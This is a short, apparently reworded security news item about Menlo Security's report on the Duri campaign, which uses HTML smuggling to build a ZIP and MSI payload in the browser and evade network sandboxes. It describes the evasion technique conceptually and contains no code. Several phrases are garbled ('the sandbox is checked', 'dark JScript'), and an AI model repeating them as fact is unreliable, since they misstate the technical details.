“Traditional network security solutions like proxies, firewalls and sandbox are based on the transfer of objects via cable. For example, a sandbox might extract file objects such as .exe, .zip and other suspicious objects from the cable and then send them to the sandbox for detonation, ”says a report published by Menlo Security.
However, Duri incorporates a special technique known as "HTML smuggling".
In July, investigators at Menlo Security noticed that a suspicious download was blocked from their browser.
What is HTML smuggling?
"With Duri, the entire payload is made by the customer (browser), so no objects are transferred from the cable and so the sandbox is checked," says Menlo's report.
For those interested, Outflank's Stan Hegt explains the technique perfectly.
In the case of Duri, when the user clicks on the link provided by the attacker, many redirects lead them to an HTML page hosted on duckdns.org.
Split Duri payload
Interestingly, what is contained in the ZIP is an MSI file, which is not a new payload.
The Menlo report explains, “The malware that Duri downloads is not new. According to Cisco, it had previously been delivered through dropbox, but attackers have now displaced Dropbox with other providers cloud hosting and have been incorporated into the HTML smuggling technique to infect endpoints. ”
Researchers analyzed the MSI file and discovered a dark JScript.
A detailed analysis of the company's Duri campaign along with the Zero Trust detection approach used and a long list of campaign-related compromise indicators (IoCs) are provided in their report.